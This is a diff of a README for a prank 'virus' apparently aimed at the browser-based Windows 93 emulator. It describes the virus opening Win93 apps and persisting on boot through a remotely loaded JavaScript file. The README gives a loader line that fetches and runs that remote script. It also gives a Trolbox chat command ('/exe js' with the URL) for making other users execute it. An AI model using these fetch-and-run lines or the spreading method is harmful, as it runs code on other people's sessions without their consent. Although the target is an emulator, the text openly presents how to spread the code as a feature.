mhmmkm/Memz-virus-v6/README.md

 The virus will open win 93 apps incuding Hydra.exe, and will also infect your boot with a js file that loads itself whenever you boot up.
 -->code($loader.script("https://raw.githack.com/mhmmkm/Memz-virus-v6/main/Code.js"))

 There is another feature which defines that this is a virus.
-You can make others get it on their pc using the win 93 app, Trolbox.
+You can make others get it on their emulator using the win 93 app, Trolbox.
 In trolbox u need to type in the command  /exe js https://raw.githack.com/mhmmkm/Memz-virus-v6/main/Code.js

 The /exe command in trolbox is the executing command that will allow others to execute whatever you put after the exe.